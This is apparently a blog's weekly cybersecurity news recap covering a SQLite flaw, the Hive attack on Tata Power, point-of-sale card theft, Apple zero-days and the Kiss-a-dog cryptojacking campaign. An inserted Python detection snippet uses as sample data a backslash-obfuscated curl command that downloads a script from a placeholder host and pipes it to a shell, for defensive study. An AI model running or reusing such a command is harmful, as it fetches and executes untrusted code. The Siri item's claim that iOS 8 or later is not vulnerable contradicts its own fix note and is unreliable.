Cyber Security Weekly Recap (24-28 Oct.)


A 22-year-old flaw in the popular SQLite database library has been reported.

The SQLite database library has a critical flaw that might be exploited by malicious actors to crash or take control of affected applications. The flaw was introduced as part of a code modification in October 2000.

This bug, identified as CVE-2022-35737 (CVSS score: 7.5), has been present in SQLite for 22 years, affecting versions 1.0.12 through 3.39.1, and was patched in version 3.39.2 on July 21, 2022.

Andreas Kellas of Trail of Bits wrote in a technical article that, depending on how the application is written, CVE-2022-35737 could be exploited on 64-bit systems to cause a denial of service and to run arbitrary code.

Tata Power Energy Company was hit by Hive Ransomware hackers.

The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for the cyber attack on Tata Power that was reported by the company two weeks ago.

The incident is believed to have taken place on October 3, 2022. The threat actor has since been seen leaking data it exfiltrated before encrypting the network, as part of a double-extortion scheme.

The affected data allegedly includes emails, addresses, phone numbers, passport numbers, taxpayer data, and contractual forms signed by clients.

Rakesh Krishnan, a security researcher, said that sensitive information like Aadhaar numbers, PANs, driver’s license information, pay data, and technical blueprints were part of the breach.

The Mumbai-based corporation is part of the Tata Group, and it operates as India’s biggest integrated power company.

More than 167,000 credit card numbers were stolen by hackers using two types of point-of-sale malware.

A threat actor has used two variants of point-of-sale (PoS) malware to collect data from over 167,000 credit cards.

Group-IB, a cybersecurity firm based in Singapore, estimates that the operators might make as much as $3.34 million by selling the stolen data dumps on underground forums.

PoS malware remains a persistent threat, even though the vast majority of attacks aimed at capturing payment data rely on JavaScript sniffers (also known as web skimmers) covertly planted on e-commerce websites.

The Group-IB research team that discovered the C2 servers used by the two PoS malware families estimates that between February and September of 2022, a total of 77,428 and 90,024 unique payment records were stolen by the MajikPOS and Treasure Hunter malware, respectively.

Most of the compromised cards reportedly originated from financial institutions in the United States, Puerto Rico, Peru, Panama, the United Kingdom, Canada, France, Poland, Norway, and Costa Rica.

The criminals behind the operation have yet to be identified, and it is unclear whether or not the stolen information has been sold.

If issuing banks don’t implement sufficient protection, criminals may use cloned cards to conduct fraudulent purchases and cash withdrawals.

Apple Issues a Patch for a New Zero-Day Vulnerability in iOS and iPadOS

The tech giant released a fix for a zero-day weakness in iOS and iPadOS that it claims is being actively exploited in the wild.

This vulnerability, tracked as CVE-2022-42827, is an out-of-bounds write in the kernel that might be exploited by a malicious application to run arbitrary code with root privileges.

An out-of-bounds write occurs when an application writes to a memory address outside the region it is permitted to access; the consequences range from data corruption and program termination to the execution of attacker-supplied code.

The iPhone manufacturer claimed to have fixed the issue with enhanced bounds checking, and it gave credit for the discovery of the flaw to an unnamed researcher.

Apple iOS and macOS Flaws May Have Allowed Applications to Listen to Your Conversations with Siri

A now-fixed security flaw in Apple’s mobile operating systems could have allowed apps with Bluetooth access to eavesdrop on users’ conversations with Siri.

Apple has addressed the Core Bluetooth problem with enhanced entitlements in iOS 16.1.

Guilherme Rambo, an app developer, is credited with finding and disclosing the flaw in August of 2022. The SiriSpy vulnerability has been tracked as CVE-2022-32946.

Rambo said that any app with Bluetooth access might record users’ conversations with Siri and audio from the iOS keyboard dictation feature when they use headphones like AirPods or Beats.

The app would leave no indication that it was accessing the microphone, nor would it need to ask for permission to do so.

Devices running iOS 8 or later are not vulnerable; a software update is available for iPad Pro (all models), iPad Air (3rd generation and later), iPad (all generations and later), and iPad mini (5th generation and later) to fix this issue. The issue has also been fixed in all currently supported versions of macOS.

An All-New Cryptojacking Attack on Docker and Kubernetes Hosts

A new cryptojacking campaign has been identified that aims to illicitly mine bitcoin by exploiting security weaknesses in Docker and Kubernetes.

CrowdStrike, a cybersecurity firm, named this operation “Kiss-a-dog” because it shares command-and-control infrastructure with other groups, such as TeamTNT, that are notorious for attacking poorly configured Docker and Kubernetes deployments.

According to a technical analysis by CrowdStrike researcher Manoj Ahuje, the URL used in the payload is obfuscated with backslashes to defeat automated decoding and the regex matching that would otherwise extract the malicious site.
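As an added example (not code from this page or from CrowdStrike's report), the Python snippet below shows why a regex-only URL extractor misses a backslash-obfuscated download command, and how normalising the command the way an unquoted POSIX shell would recovers the site for detection. The sample command, the exact obfuscation form and the `.invalid` domain are constructed assumptions for this illustration.

```python
import re

# Constructed sample: a download command in which the URL has been hidden by
# inserting backslashes. An unquoted POSIX shell word silently drops a
# backslash before a non-special character, so the shell still sees a valid
# URL while a naive scanner does not. The obfuscation form is an assumption
# for this example, and ".invalid" is a reserved placeholder TLD.
SAMPLE_COMMAND = r"curl -Lk h\t\tp://ex\ample-pa\yload.invalid/ki\ss.sh | sh"

# The kind of pattern a simple regex-based scanner would run over the payload.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/\S*)?")


def extract_urls_naive(text):
    """Apply the URL regex directly to the raw command text."""
    return URL_RE.findall(text)


def shell_unescape(text):
    """Remove backslash escapes as an unquoted POSIX shell word would:
    backslash + character yields that character; backslash + newline is a
    line continuation and is dropped entirely."""
    out = []
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):
            nxt = text[i + 1]
            if nxt != "\n":
                out.append(nxt)
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def extract_urls(text):
    """Normalise shell backslash obfuscation first, then apply the same regex."""
    return URL_RE.findall(shell_unescape(text))


if __name__ == "__main__":
    print("naive:     ", extract_urls_naive(SAMPLE_COMMAND))
    print("normalised:", extract_urls(SAMPLE_COMMAND))
```

The same normalisation step belongs in front of any indicator extraction that runs over captured shell commands, since the regex itself is unchanged between the two calls.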

The next phase in the attack chain attempts to break out of the container and spread across the compromised network, while also disabling the cloud service that is monitoring the intrusion.

About the author

Lidia Howler

Lidia is a web content creator with years of experience in the cyber-security sector. She helps readers with articles on malware removal and online security. Her striving for simplicity and well-researched information provides users with easy-to-follow IT-related tips and step-by-step tutorials.
